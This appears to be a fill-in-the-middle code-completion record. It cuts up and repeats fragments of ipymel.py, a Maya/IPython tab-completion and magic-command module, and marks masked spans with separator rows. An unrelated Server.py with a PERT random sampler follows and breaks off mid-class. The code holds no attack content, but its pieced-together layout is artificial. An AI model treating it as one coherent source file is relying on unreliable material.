print('The requested directory does not exist in history.')
return
else:
opts = {}
# elif parameter_s.startswith('--'):
# ps = None
# fallback = None
# pat = parameter_s[2:]
# dh = self.shell.user_ns['_sh']
# # first search only by basename (last component)
# for ent in reversed(dh):
# if pat in os.path.basename(ent) and os.path.isdir(ent):
# ps = ent
# break
#
# if fallback is None and pat in ent and os.path.isdir(ent):
# fallback = ent
#
# # if we have no last part match, pick the first full path match
# if ps is None:
# ps = fallback
#
# if ps is None:
# print "No matching entry in directory history"
# return
# else:
# opts = {}
else:
# turn all non-space-escaping backslashes to slashes,
# for c:\windows\directory\names\
parameter_s = re.sub(r'\\(?! )', '/', parameter_s)
opts, ps = self.parse_options(parameter_s, 'qb', mode='string')
# jump to previous
if ps == '-':
try:
ps = ip.ev('_sh[-2]')
except IndexError:
raise UsageError('%cd -: No previous directory to change to.')
# # jump to bookmark if needed
# else:
# if not os.path.exists(ps) or opts.has_key('b'):
# bkms = self.db.get('bookmarks', {})
#
# if bkms.has_key(ps):
# target = bkms[ps]
# print '(bookmark:%s) -> %s' % (ps,target)
# ps = target
# else:
# if opts.has_key('b'):
# raise UsageError("Bookmark '%s' not found. "
# "Use '%%bookmark -l' to see your bookmarks." % ps)
# at this point ps should point to the target dir
if ps:
ip.ex('openFile("%s", f=1)' % ps)
# try:
# os.chdir(os.path.expanduser(ps))
# if self.shell.rc.term_title:
# #print 'set term title:',self.shell.rc.term_title # dbg
# platutils.set_term_title('IPy ' + abbrev_cwd())
# except OSError:
# print sys.exc_info()[1]
# else:
# cwd = os.getcwd()
# dhist = self.shell.user_ns['_sh']
# if oldcwd != cwd:
# dhist.append(cwd)
# self.db['dhist'] = compress_dhist(dhist)[-100:]
# else:
# os.chdir(self.shell.home_dir)
# if self.shell.rc.term_title:
# platutils.set_term_title("IPy ~")
# cwd = os.getcwd()
# dhist = self.shell.user_ns['_sh']
#
# if oldcwd != cwd:
# dhist.append(cwd)
# self.db['dhist'] = compress_dhist(dhist)[-100:]
# if not 'q' in opts and self.shell.user_ns['_sh']:
# print self.shell.user_ns['_sh'][-1]
# maya sets a sigint / ctrl-c / KeyboardInterrupt handler that quits maya -
# want to override this to get "normal" python interpreter behavior, where it
# interrupts the current python command, but doesn't exit the interpreter
def ipymel_sigint_handler(signal, frame):
raise KeyboardInterrupt
def install_sigint_handler(force=False):
import signal
if force or signal.getsignal(signal.SIGINT) == ipymel_sigint_handler:
signal.signal(signal.SIGINT, ipymel_sigint_handler)
# unfortunately, it seems maya overrides the SIGINT hook whenever a plugin is
# loaded...
def sigint_plugin_loaded_callback(*args):
# from the docs, as of 2015 the args are:
# ( [ pathToPlugin, pluginName ], clientData )
install_sigint_handler()
sigint_plugin_loaded_callback_id = None
DAG_MAGIC_COMPLETER_RE = re.compile(r"(?P<preamble>%dag\s+)(?P<namematch>(?P<previous_parts>([a-zA-Z0-9:_]*\|)*)(?P<current_part>[a-zA-Z0-9:_]*))$")
DAG_COMPLETER_RE = re.compile(r"(?P<preamble>((.+(\s+|\())|(SCENE\.))[^\w|:._]*)(?P<namematch>(?P<previous_parts>([a-zA-Z0-9:_]*\|)+)(?P<current_part>[a-zA-Z0-9:_]*))$")
NAME_COMPLETER_RE = re.compile(r"(?P<preamble>((.+(\s+|\())|(SCENE\.))[^\w|:._]*)(?P<namematch>(?P<previous_parts>([a-zA-Z0-9:_.]*(\.|\|))*)(?P<current_part>[a-zA-Z0-9:_]*))$")
ATTR_RE = re.compile(r"""(?P<prefix>[a-zA-Z_0-9|:.]+)\.(?P<partial_attr>\w*)$""")
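# --- Added illustration (not part of the original module) ---------------------
# A rough sketch of what the completer regexes above pull out of a partially
# typed command line. The helper name `_demo_completer_regexes` and the sample
# strings are assumptions for illustration only; ipymel itself never calls this.
def _demo_completer_regexes():
    # completing ls('persp|p<tab> : the name portion handed to the completer is "persp|p"
    m = NAME_COMPLETER_RE.match("ls('persp|p")
    assert m is not None and m.group('namematch') == 'persp|p'
    # completing a plug such as persp.t<tab> : ATTR_RE splits the node from the partial attribute
    a = ATTR_RE.match('persp.t')
    assert a is not None and a.group('prefix') == 'persp' and a.group('partial_attr') == 't'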
def setup(shell):
global ip
if hasattr(shell, 'get_ipython'):
ip = shell.get_ipython()
else:
ip = get_ipython()
ip.set_hook('complete_command', pymel_python_completer, re_key="(?!{})".format(NAME_COMPLETER_RE.pattern))
ip.set_hook('complete_command', pymel_dag_completer, re_key=DAG_MAGIC_COMPLETER_RE.pattern)
ip.set_hook('complete_command', pymel_dag_completer, re_key=DAG_COMPLETER_RE.pattern)
ip.set_hook('complete_command', pymel_name_completer, re_key=NAME_COMPLETER_RE.pattern)
ip.set_hook('complete_command', open_completer, str_key="openf")
ip.ex("from pymel.core import *")
# stuff in __main__ is not necessarily in ipython's 'main' namespace... so
# if the user has something in userSetup.py that he wants put in the
# "interactive" namespace, it won't be - unless we do this:
ip.ex('from __main__ import *')
# if you don't want pymel imported into the main namespace, you can replace the above with something like:
#ip.ex("import pymel as pm")
define_magic(ip, openf)
define_magic(ip, dag)
define_magic(ip, dghist)
# add projects
ip.ex("""
import os.path
for _mayaproj in optionVar.get('RecentProjectsList', []):
_mayaproj = os.path.join( _mayaproj, 'scenes' )
if _mayaproj not in _dh:
_dh.append(_mayaproj)""")
# add files
ip.ex("""
import os.path
_sh=[]
for _mayaproj in optionVar.get('RecentFilesList', []):
if _mayaproj not in _sh:
_sh.append(_mayaproj)""")
# setup a handler for ctrl-c / SIGINT / KeyboardInterrupt, so maya / ipymel
# doesn't quit
install_sigint_handler(force=True)
# unfortunately, when Mental Ray loads, it installs a new SIGINT handler
# which restores the old "bad" behavior... need to install a plugin callback
# to restore ours...
global sigint_plugin_loaded_callback_id
import pymel.core as pm
if sigint_plugin_loaded_callback_id is None:
sigint_plugin_loaded_callback_id = pm.api.MSceneMessage.addStringArrayCallback(
pm.api.MSceneMessage.kAfterPluginLoad,
sigint_plugin_loaded_callback)
def main():
import IPython
ipy_ver = IPython.__version__.split('.')
ipy_ver = [int(x) if x.isdigit() else x for x in ipy_ver]
if ipy_ver >= [1, 0]:
import IPython.terminal.ipapp
app = IPython.terminal.ipapp.TerminalIPythonApp.instance()
app.initialize()
setup(app.shell)
app.start()
elif ipy_ver >= [0, 11]:
import IPython.frontend.terminal.ipapp
app = IPython.frontend.terminal.ipapp.TerminalIPythonApp.instance()
app.initialize()
setup(app.shell)
app.start()
else:
import IPython.Shell
shell = IPython.Shell.start()
setup(shell)
shell.mainloop()
if __name__ == '__main__':
main()
| raise TryNext | conditional_block |
ipymel.py | """
pymel ipython configuration
Current Features
----------------
tab completion of depend nodes, dag nodes, and attributes
automatic import of pymel
Future Features
---------------
- tab completion of PyNode attributes
- color coding of tab complete options
- to differentiate between methods and attributes
- dag nodes vs depend nodes
- shortNames vs longNames
- magic commands
- bookmarking of maya's recent project and files
To Use
------
place in your PYTHONPATH
add the following line to the 'main' function of $HOME/.ipython/ipy_user_conf.py::
import ipymel
Author: Chad Dombrova
"""
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from builtins import range
from past.builtins import basestring
from builtins import object
from optparse import OptionParser
try:
import maya
except ImportError as e:
print("ipymel can only be set up if the maya package can be imported")
raise e
import IPython
ipy_ver = IPython.__version__.split('.')
ipy_ver = [int(x) if x.isdigit() else x for x in ipy_ver]
if ipy_ver < [0, 11]:
def get_ipython():
import IPython.ipapi
return IPython.ipapi.get()
IPython.ipapi.IPApi.define_magic = IPython.ipapi.IPApi.expose_magic
import IPython.ColorANSI as coloransi
from IPython.genutils import page
from IPython.ipapi import UsageError
import IPython.Extensions.ipy_completers
def get_colors(obj):
return color_table[obj.rc.colors].colors
else: # >= [0, 11]
import IPython.utils.coloransi as coloransi
from IPython.core.page import page
from IPython.core.error import UsageError
def get_colors(obj):
return color_table[ip.colors].colors
if ipy_ver >= [0, 13]:
def define_magic(interpreter, function):
def get_ipython():
return interpreter
from IPython.core.magic import register_line_magic
register_line_magic(function)
else:
def define_magic(interpreter, function):
interpreter.define_magic(function.__name__, function)
try:
from IPython.core.error import TryNext
except ImportError:
from IPython.ipapi import TryNext
Colors = coloransi.TermColors
ColorScheme = coloransi.ColorScheme
ColorSchemeTable = coloransi.ColorSchemeTable
ip = None
try:
import readline
except ImportError:
import pyreadline as readline
delim = readline.get_completer_delims()
delim = delim.replace('|', '') # remove pipes
delim = delim.replace(':', '') # remove colon
# delim = delim.replace("'", '') # remove quotes
# delim = delim.replace('"', '') # remove quotes
readline.set_completer_delims(delim)
import inspect
import re
import glob
import os
import shlex
import sys
# don't import pymel here, as this will trigger loading of maya/pymel
# immediately, and things in the userSetup.py won't get properly entered into
# the ipython shell's namespace... we need the startup of maya to happen
# from "within" ipython, ie, when we do:
# ip.ex("from pymel.core import *")
# from pymel import core
# we also can't even use maya.cmds, because it doesn't work in anything other
# than the main thread... and most of the tab-completion stuff runs in a
# subthread... so api it is!
# Use api2 because it's faster...
import maya.api.OpenMaya as om
_scheme_default = 'Linux'
# Build a few color schemes
NoColor = ColorScheme(
'NoColor', {
'instance': Colors.NoColor,
'collapsed': Colors.NoColor,
'tree': Colors.NoColor,
'transform': Colors.NoColor,
'shape': Colors.NoColor,
'nonunique': Colors.NoColor,
'nonunique_transform': Colors.NoColor,
'normal': Colors.NoColor # color off (usu. Colors.Normal)
})
LinuxColors = ColorScheme(
'Linux', {
'instance': Colors.LightCyan,
'collapsed': Colors.Yellow,
'tree': Colors.Green,
'transform': Colors.White,
'shape': Colors.LightGray,
'nonunique': Colors.Red,
'nonunique_transform': Colors.LightRed,
'normal': Colors.Normal # color off (usu. Colors.Normal)
})
LightBGColors = ColorScheme(
'LightBG', {
'instance': Colors.Cyan,
'collapsed': Colors.LightGreen,
'tree': Colors.Blue,
'transform': Colors.DarkGray,
'shape': Colors.Black,
'nonunique': Colors.Red,
'nonunique_transform': Colors.LightRed,
'normal': Colors.Normal # color off (usu. Colors.Normal)
})
# Build table of color schemes (needed by the dag_parser)
color_table = ColorSchemeTable([NoColor, LinuxColors, LightBGColors],
_scheme_default)
color_table['Neutral'] = LightBGColors
def splitDag(obj):
buf = obj.split('|')
tail = buf[-1]
path = '|'.join(buf[:-1])
return path, tail
def expand(obj):
"""
Allows for completion of objects that reside within a namespace. For example,
``tra*`` will match ``trak:camera`` and ``tram``.
For now, we will hardwire the search to a depth of three recursive namespaces.
TODO:
add some code to determine how deep we should go
"""
return (obj + '*', obj + '*:*', obj + '*:*:*')
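# Added illustration (not in the original source): a quick, hedged check of what
# expand() returns; the helper name `_demo_expand` is an assumption for clarity only.
def _demo_expand():
    # 'tra' is searched as typed plus one and two namespace levels deep,
    # so it can complete to 'tram' as well as 'trak:camera' or 'trak:rig:camera'
    assert expand('tra') == ('tra*', 'tra*:*', 'tra*:*:*')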
def api_ls(args, dagOnly, long=False):
'''Because the tab completer runs in a subthread, and cmds.ls doesn't
seem to work very well from a subthread, use maya.api.OpenMaya'''
sel = om.MSelectionList()
if isinstance(args, basestring):
args = [args]
for arg in args:
# if it doesn't exist, MSelectionList.add will raise an error -
# ignore that
try:
sel.add(arg)
except Exception:
pass
if not long and not dagOnly:
return list(sel.getSelectionStrings())
# long is only used when getting nodes, not plugs, so ignore that case
# for now...
results = []
mfnDep = om.MFnDependencyNode()
for i in range(sel.length()):
try:
dagPath = sel.getDagPath(i)
except TypeError:
if dagOnly:
continue
mobj = sel.getDependNode(i)
mfnDep.setObject(mobj)
results.append(mfnDep.name())
else:
if long:
results.append(dagPath.fullPathName())
else:
results.append(dagPath.partialPathName())
return results
def api_children(path):
sel = om.MSelectionList()
try:
sel.add(path)
except RuntimeError:
return []
if not sel.length():
return []
try:
dagPath = sel.getDagPath(0)
except TypeError:
return []
return [om.MFnDagNode(dagPath.child(i)).fullPathName()
for i in range(dagPath.childCount())]
def api_listAttr(path, shortNames=False):
sel = om.MSelectionList()
try:
sel.add(path)
except RuntimeError:
return []
if not sel.length():
return []
try:
plug = sel.getPlug(0)
except TypeError:
try:
node = om.MFnDependencyNode(sel.getDependNode(0))
except RuntimeWarning:
return []
attrs = [om.MFnAttribute(node.attribute(i))
for i in range(node.attributeCount())]
if shortNames:
return [x.shortName for x in attrs]
else:
return [x.name for x in attrs]
else:
return [plug.child(i).partialName(useLongNames=not shortNames)
for i in range(plug.numChildren())]
def complete_node_with_attr(node, attr):
# print "noe_with_attr", node, attr
long_attrs = api_listAttr(node)
short_attrs = api_listAttr(node, shortNames=1)
# if node is a plug ( 'persp.t' ), the first result will be the passed plug
if '.' in node:
attrs = long_attrs[1:] + short_attrs[1:]
else:
attrs = long_attrs + short_attrs
return [u'%s.%s' % (node, a) for a in attrs if a.startswith(attr)]
def pymel_dag_completer(self, event):
return pymel_name_completer(self, event, dagOnly=True)
def pymel_name_completer(self, event, dagOnly=False):
def get_children(obj, dagOnly):
path, partialObj = splitDag(obj)
# print "getting children", repr(path), repr(partialObj)
# try:
if True:
fullpaths = api_ls(path, dagOnly, long=True)
if not fullpaths or not fullpaths[0]:
return []
fullpath = fullpaths[0]
children = api_children(fullpath)
if not children:
return []
# except Exception:
# return []
matchStr = fullpath + '|' + partialObj
matches = [x.replace(fullpath, path, 1) for x in children if x.startswith(matchStr)]
return matches
# print "\nnode", repr(event.symbol), repr(event.line)
# print "\nbegin"
# note that the NAME_COMPLETER_RE also works for DAG_MAGIC_COMPLETER_RE
# and DAG_COMPLETER_RE, since those are simply more restrictive versions,
# which set "dagOnly"
# print "text_until_cursor: {}".format(event.text_until_cursor)
# print "symbol: {}".format(event.symbol)
linematch = NAME_COMPLETER_RE.match(event.text_until_cursor)
# print "linematch: {}".format(linematch.group(0))
nametext = linematch.group('namematch')
# print "nametext: {}".format(nametext)
matches = None
#--------------
# Attributes
#--------------
if not dagOnly:
attr_match = ATTR_RE.match(nametext)
else:
attr_match = None
if attr_match:
node, attr = attr_match.groups()
if node == 'SCENE':
res = api_ls(attr + '*', dagOnly)
if res:
matches = ['SCENE.' + x for x in res if '|' not in x]
elif node.startswith('SCENE.'):
node = node.replace('SCENE.', '')
matches = ['SCENE.' + x for x in complete_node_with_attr(node, attr) if '|' not in x]
else:
matches = complete_node_with_attr(node, attr)
#--------------
# Nodes
#--------------
else:
# we don't yet have a full node
if '|' not in nametext or (nametext.startswith('|') and nametext.count('|') == 1):
# print "partial node"
kwargs = {}
if nametext.startswith('|'):
kwargs['long'] = True
matches = api_ls(expand(nametext), dagOnly, **kwargs)
# we have a full node, get its children
else:
matches = get_children(nametext, dagOnly)
if not matches:
raise TryNext
# if we have only one match, get the children as well
if len(matches) == 1 and not attr_match:
res = get_children(matches[0] + '|', dagOnly)
matches += res
if event.symbol != nametext:
# in some situations, the event.symbol will only have incomplete
# information - ie, if we are completing "persp|p", then the symbol will
# be "p" - nametext will give us the full "persp|p", which we need so we
# know we're checking for children of "persp". In these situations, we
# need to STRIP the leading non-symbol portion, so we don't end up with
# "persp|persp|perspShape" after completion.
if nametext.endswith(event.symbol):
if not event.symbol:
preSymbol = nametext
else:
preSymbol = nametext[:-len(event.symbol)]
matches = [x[len(preSymbol):] if x.startswith(preSymbol) else x
for x in matches]
# HOWEVER - in other situations, the symbol will contain too much
# information - ie, stuff that isn't strictly speaking a node name - such
# as when we complete "SCENE.p". In this case, the symbol is "SCENE.p",
# whereas nametext is simply "p". In such cases, we need to PREPEND the
# extra "SCENE." to the result, or else ipython will think our matches
# are not actually matches...
elif event.symbol.endswith(nametext):
if not nametext:
symbolPrefix = event.symbol
else:
symbolPrefix = event.symbol[:-len(nametext)]
matches = [symbolPrefix + x for x in matches]
return matches
PYTHON_TOKEN_RE = re.compile(r"(\S+(\.\w+)*)\.(\w*)$")
def pymel_python_completer(self, event):
"""Match attributes or global python names"""
import pymel.core as pm
# print "python_matches"
text = event.symbol
# print repr(text)
# Another option, seems to work great. Catches things like ''.<tab>
m = PYTHON_TOKEN_RE.match(text)
if not m:
raise TryNext
expr, attr = m.group(1, 3)
# print type(self.Completer), dir(self.Completer)
# print self.Completer.namespace
# print self.Completer.global_namespace
try:
# print "first"
obj = eval(expr, self.Completer.namespace)
except Exception:
try:
# print "second"
obj = eval(expr, self.Completer.global_namespace)
except Exception:
raise TryNext
# print "complete"
if isinstance(obj, (pm.nt.DependNode, pm.Attribute)):
# print "isinstance"
node = str(obj)
long_attrs = api_listAttr(node)
short_attrs = api_listAttr(node, shortNames=1)
matches = []
matches = self.Completer.python_matches(text)
# print "here"
# if node is a plug ( 'persp.t' ), the first result will be the passed plug
if '.' in node:
attrs = long_attrs[1:] + short_attrs[1:]
else:
attrs = long_attrs + short_attrs
# print "returning"
matches += [expr + '.' + at for at in attrs]
#import colorize
#matches = [ colorize.colorize(x,'magenta') for x in matches ]
return matches
raise TryNext
def buildRecentFileMenu():
import pymel.core as pm
if "RecentFilesList" not in pm.optionVar:
return
# get the list
RecentFilesList = pm.optionVar["RecentFilesList"]
nNumItems = len(RecentFilesList)
RecentFilesMaxSize = pm.optionVar["RecentFilesMaxSize"]
# # check if there are too many items in the list
# if (RecentFilesMaxSize < nNumItems):
#
# #if so, truncate the list
# nNumItemsToBeRemoved = nNumItems - RecentFilesMaxSize
#
# #Begin removing items from the head of the array (least recent file in the list)
# for ($i = 0; $i < $nNumItemsToBeRemoved; $i++):
#
# core.optionVar -removeFromArray "RecentFilesList" 0;
#
# RecentFilesList = core.optionVar["RecentFilesList"]
# nNumItems = len($RecentFilesList);
# The RecentFilesTypeList optionVar may not exist since it was
# added after the RecentFilesList optionVar. If it doesn't exist,
# we create it and initialize it with a guess at the file type
if nNumItems > 0:
if "RecentFilesTypeList" not in pm.optionVar:
pm.mel.initRecentFilesTypeList(RecentFilesList)
RecentFilesTypeList = pm.optionVar["RecentFilesTypeList"]
# toNativePath
# first, check if we are the same.
def open_completer(self, event):
relpath = event.symbol
# print event # dbg
if '-b' in event.line:
# return only bookmark completions
bkms = self.db.get('bookmarks', {})
return list(bkms.keys())
if event.symbol == '-':
width_dh = str(len(str(len(ip.user_ns['_sh']) + 1)))
# jump in directory history by number
fmt = '-%0' + width_dh + 'd [%s]'
ents = [fmt % (i, s) for i, s in enumerate(ip.user_ns['_sh'])]
if len(ents) > 1:
return ents
return []
raise TryNext
class TreePager(object):
def __init__(self, colors, options):
self.colors = colors
self.options = options
# print options.depth
def do_level(self, obj, depth, isLast):
if isLast[-1]:
sep = '`-- '
else:
sep = '|-- '
#sep = '|__ '
depth += 1
branch = ''
for x in isLast[:-1]:
if x:
branch += ' '
else:
branch += '| '
branch = self.colors['tree'] + branch + sep + self.colors['normal']
children = self.getChildren(obj)
name = self.getName(obj)
num = len(children) - 1
if children:
if self.options.maxdepth and depth >= self.options.maxdepth:
state = '+'
else:
state = '-'
pre = self.colors['collapsed'] + state + ' '
else:
pre = ' '
yield pre + branch + name + self.colors['normal'] + '\n'
# yield Colors.Yellow + branch + sep + Colors.Normal+ name + '\n'
if not self.options.maxdepth or depth < self.options.maxdepth:
for i, x in enumerate(children):
for line in self.do_level(x, depth, isLast + [i == num]):
yield line
def make_tree(self, roots):
num = len(roots) - 1
tree = ''
for i, x in enumerate(roots):
for line in self.do_level(x, 0, [i == num]):
tree += line
return tree
class DagTree(TreePager):
def getChildren(self, obj):
if self.options.shapes:
return obj.getChildren()
else:
return obj.getChildren(type='transform')
def getName(self, obj):
import pymel.core as pm
name = obj.nodeName()
if obj.isInstanced():
if isinstance(obj, pm.nt.Transform):
# keep transforms bolded
color = self.colors['nonunique_transform']
else:
color = self.colors['nonunique']
id = obj.instanceNumber()
if id != 0:
source = ' -> %s' % obj.getOtherInstances()[0]
else:
source = ''
name = color + name + self.colors['instance'] + ' [' + str(id) + ']' + source
elif not obj.isUniquelyNamed():
if isinstance(obj, pm.nt.Transform):
# keep transforms bolded
color = self.colors['nonunique_transform']
else:
color = self.colors['nonunique']
name = color + name
elif isinstance(obj, pm.nt.Transform):
# bold
name = self.colors['transform'] + name
else:
name = self.colors['shape'] + name
return name
# formerly: magic_dag
dag_parser = OptionParser()
dag_parser.add_option("-d", type="int", dest="maxdepth")
dag_parser.add_option("-t", action="store_false", dest="shapes", default=True)
dag_parser.add_option("-s", action="store_true", dest="shapes")
def dag(self, parameter_s=''):
import pymel.core as pm
options, args = dag_parser.parse_args(parameter_s.split())
colors = get_colors(self)
dagtree = DagTree(colors, options)
if args:
roots = [pm.PyNode(args[0])]
else:
roots = pm.ls(assemblies=1)
page(dagtree.make_tree(roots))
class DGHistoryTree(TreePager):
def getChildren(self, obj):
source, dest = obj
return source.node().listConnections(plugs=True, connections=True, source=True, destination=False, sourceFirst=True)
def getName(self, obj):
source, dest = obj
name = "%s -> %s" % (source, dest)
return name
def make_tree(self, root):
import pymel.core as pm
roots = pm.listConnections(root, plugs=True, connections=True, source=True, destination=False, sourceFirst=True)
return TreePager.make_tree(self, roots)
# formerly: magic_dghist
dg_parser = OptionParser()
dg_parser.add_option("-d", type="int", dest="maxdepth")
dg_parser.add_option("-t", action="store_false", dest="shapes", default=True)
dg_parser.add_option("-s", action="store_true", dest="shapes")
def dghist(self, parameter_s=''):
"""
Display the upstream (input) connection history of the given node(s) as a tree.
"""
import pymel.core as pm
options, args = dg_parser.parse_args(parameter_s.split())
if not args:
print("must pass in nodes to display the history of")
return
colors = get_colors(self)
dgtree = DGHistoryTree(colors, options)
roots = [pm.PyNode(args[0])]
page(dgtree.make_tree(roots))
# formerly: magic_open
def openf(self, parameter_s=''):
"""Change the current working directory.
This command automatically maintains an internal list of directories
you visit during your IPython session, in the variable _sh. The
command %dhist shows this history nicely formatted. You can also
do 'cd -<tab>' to see directory history conveniently.
Usage:
openFile 'dir': changes to directory 'dir'.
openFile -: changes to the last visited directory.
openFile -<n>: changes to the n-th directory in the directory history.
openFile --foo: change to directory that matches 'foo' in history
openFile -b <bookmark_name>: jump to a bookmark set by %bookmark
(note: cd <bookmark_name> is enough if there is no
directory <bookmark_name>, but a bookmark with the name exists.)
'cd -b <tab>' allows you to tab-complete bookmark names.
Options:
-q: quiet. Do not print the working directory after the cd command is
executed. By default IPython's cd command does print this directory,
since the default prompts do not display path information.
Note that !cd doesn't work for this purpose because the shell where
!command runs is immediately discarded after executing 'command'."""
parameter_s = parameter_s.strip()
#bkms = self.shell.persist.get("bookmarks",{})
oldcwd = os.getcwd()
numcd = re.match(r'(-)(\d+)$', parameter_s)
# jump in directory history by number
if numcd:
nn = int(numcd.group(2))
try:
ps = ip.ev('_sh[%d]' % nn)
except IndexError:
print('The requested directory does not exist in history.')
return
else:
opts = {}
# elif parameter_s.startswith('--'):
# ps = None
# fallback = None
# pat = parameter_s[2:]
# dh = self.shell.user_ns['_sh']
# # first search only by basename (last component)
# for ent in reversed(dh):
# if pat in os.path.basename(ent) and os.path.isdir(ent):
# ps = ent
# break
#
# if fallback is None and pat in ent and os.path.isdir(ent):
# fallback = ent
#
# # if we have no last part match, pick the first full path match
# if ps is None:
# ps = fallback
#
# if ps is None:
# print "No matching entry in directory history"
# return
# else:
# opts = {}
else:
# turn all non-space-escaping backslashes to slashes,
# for c:\windows\directory\names\
parameter_s = re.sub(r'\\(?! )', '/', parameter_s)
opts, ps = self.parse_options(parameter_s, 'qb', mode='string')
# jump to previous
if ps == '-':
try:
ps = ip.ev('_sh[-2]')
except IndexError:
raise UsageError('%cd -: No previous directory to change to.')
# # jump to bookmark if needed
# else:
# if not os.path.exists(ps) or opts.has_key('b'):
# bkms = self.db.get('bookmarks', {})
#
# if bkms.has_key(ps):
# target = bkms[ps]
# print '(bookmark:%s) -> %s' % (ps,target)
# ps = target
# else:
# if opts.has_key('b'):
# raise UsageError("Bookmark '%s' not found. "
# "Use '%%bookmark -l' to see your bookmarks." % ps)
# at this point ps should point to the target dir
if ps:
ip.ex('openFile("%s", f=1)' % ps)
# try:
# os.chdir(os.path.expanduser(ps))
# if self.shell.rc.term_title:
# #print 'set term title:',self.shell.rc.term_title # dbg
# platutils.set_term_title('IPy ' + abbrev_cwd())
# except OSError:
# print sys.exc_info()[1]
# else:
# cwd = os.getcwd()
# dhist = self.shell.user_ns['_sh']
# if oldcwd != cwd:
# dhist.append(cwd)
# self.db['dhist'] = compress_dhist(dhist)[-100:]
# else:
# os.chdir(self.shell.home_dir)
# if self.shell.rc.term_title:
# platutils.set_term_title("IPy ~")
# cwd = os.getcwd()
# dhist = self.shell.user_ns['_sh']
#
# if oldcwd != cwd:
# dhist.append(cwd)
# self.db['dhist'] = compress_dhist(dhist)[-100:]
# if not 'q' in opts and self.shell.user_ns['_sh']:
# print self.shell.user_ns['_sh'][-1]
# maya sets a sigint / ctrl-c / KeyboardInterrupt handler that quits maya -
# want to override this to get "normal" python interpreter behavior, where it
# interrupts the current python command, but doesn't exit the interpreter
def ipymel_sigint_handler(signal, frame):
raise KeyboardInterrupt
def install_sigint_handler(force=False):
import signal
if force or signal.getsignal(signal.SIGINT) == ipymel_sigint_handler:
signal.signal(signal.SIGINT, ipymel_sigint_handler)
# unfortunately, it seems maya overrides the SIGINT hook whenever a plugin is
# loaded...
def | (*args):
# from the docs, as of 2015 the args are:
# ( [ pathToPlugin, pluginName ], clientData )
install_sigint_handler()
sigint_plugin_loaded_callback_id = None
DAG_MAGIC_COMPLETER_RE = re.compile(r"(?P<preamble>%dag\s+)(?P<namematch>(?P<previous_parts>([a-zA-Z0-9:_]*\|)*)(?P<current_part>[a-zA-Z0-9:_]*))$")
DAG_COMPLETER_RE = re.compile(r"(?P<preamble>((.+(\s+|\())|(SCENE\.))[^\w|:._]*)(?P<namematch>(?P<previous_parts>([a-zA-Z0-9:_]*\|)+)(?P<current_part>[a-zA-Z0-9:_]*))$")
NAME_COMPLETER_RE = re.compile(r"(?P<preamble>((.+(\s+|\())|(SCENE\.))[^\w|:._]*)(?P<namematch>(?P<previous_parts>([a-zA-Z0-9:_.]*(\.|\|))*)(?P<current_part>[a-zA-Z0-9:_]*))$")
ATTR_RE = re.compile(r"""(?P<prefix>[a-zA-Z_0-9|:.]+)\.(?P<partial_attr>\w*)$""")
def setup(shell):
global ip
if hasattr(shell, 'get_ipython'):
ip = shell.get_ipython()
else:
ip = get_ipython()
ip.set_hook('complete_command', pymel_python_completer, re_key="(?!{})".format(NAME_COMPLETER_RE.pattern))
ip.set_hook('complete_command', pymel_dag_completer, re_key=DAG_MAGIC_COMPLETER_RE.pattern)
ip.set_hook('complete_command', pymel_dag_completer, re_key=DAG_COMPLETER_RE.pattern)
ip.set_hook('complete_command', pymel_name_completer, re_key=NAME_COMPLETER_RE.pattern)
ip.set_hook('complete_command', open_completer, str_key="openf")
ip.ex("from pymel.core import *")
# stuff in __main__ is not necessarily in ipython's 'main' namespace... so
# if the user has something in userSetup.py that he wants put in the
# "interactive" namespace, it won't be - unless we do this:
ip.ex('from __main__ import *')
# if you don't want pymel imported into the main namespace, you can replace the above with something like:
#ip.ex("import pymel as pm")
define_magic(ip, openf)
define_magic(ip, dag)
define_magic(ip, dghist)
# add projects
ip.ex("""
import os.path
for _mayaproj in optionVar.get('RecentProjectsList', []):
_mayaproj = os.path.join( _mayaproj, 'scenes' )
if _mayaproj not in _dh:
_dh.append(_mayaproj)""")
# add files
ip.ex("""
import os.path
_sh=[]
for _mayaproj in optionVar.get('RecentFilesList', []):
if _mayaproj not in _sh:
_sh.append(_mayaproj)""")
# setup a handler for ctrl-c / SIGINT / KeyboardInterrupt, so maya / ipymel
# doesn't quit
install_sigint_handler(force=True)
# unfortunately, when Mental Ray loads, it installs a new SIGINT handler
# which restores the old "bad" behavior... need to install a plugin callback
# to restore ours...
global sigint_plugin_loaded_callback_id
import pymel.core as pm
if sigint_plugin_loaded_callback_id is None:
sigint_plugin_loaded_callback_id = pm.api.MSceneMessage.addStringArrayCallback(
pm.api.MSceneMessage.kAfterPluginLoad,
sigint_plugin_loaded_callback)
def main():
import IPython
ipy_ver = IPython.__version__.split('.')
ipy_ver = [int(x) if x.isdigit() else x for x in ipy_ver]
if ipy_ver >= [1, 0]:
import IPython.terminal.ipapp
app = IPython.terminal.ipapp.TerminalIPythonApp.instance()
app.initialize()
setup(app.shell)
app.start()
elif ipy_ver >= [0, 11]:
import IPython.frontend.terminal.ipapp
app = IPython.frontend.terminal.ipapp.TerminalIPythonApp.instance()
app.initialize()
setup(app.shell)
app.start()
else:
import IPython.Shell
shell = IPython.Shell.start()
setup(shell)
shell.mainloop()
if __name__ == '__main__':
main()
| sigint_plugin_loaded_callback | identifier_name |
Server.py | import numpy as np
def mod_pert_random(low, likely, high, confidence=4, samples=30):
"""Produce random numbers according to the 'Modified PERT'
distribution.
:param low: The lowest value expected as possible.
:param likely: The 'most likely' value, statistically, the mode.
:param high: The highest value expected as possible.
:param confidence: This is typically called 'lambda' in literature
about the Modified PERT distribution. The value
4 here matches the standard PERT curve. Higher
values indicate higher confidence in the mode.
:param samples: The number of samples to generate; default value is 30.
Formulas from "Modified Pert Simulation" by Paulo Buchsbaum.
"""
# Check minimum & maximum confidence levels to allow:
confidence = min(8, confidence)
confidence = max(2, confidence)
mean = (low + confidence * likely + high) / (confidence + 2)
a = (mean - low) / (high - low) * (confidence + 2)
b = ((confidence + 1) * high - low - confidence * likely) / (high - low)
beta = np.random.beta(a, b, samples)
beta = beta * (high - low) + low
return beta
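# --- Added usage sketch (not part of the original script) ---------------------
# The values below are arbitrary examples; the comparison with the theoretical
# PERT mean (low + 4*likely + high) / 6 is only approximate because the draws
# are random, so the tolerance is deliberately loose.
def _demo_mod_pert_random():
    draws = mod_pert_random(low=0, likely=40, high=90, samples=1000)
    assert draws.min() >= 0 and draws.max() <= 90        # always within [low, high]
    expected_mean = (0 + 4 * 40 + 90) / 6                # ~41.7 for the standard PERT curve
    assert abs(draws.mean() - expected_mean) < 5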
class Queue:
def __init__(self):
self.groups = []
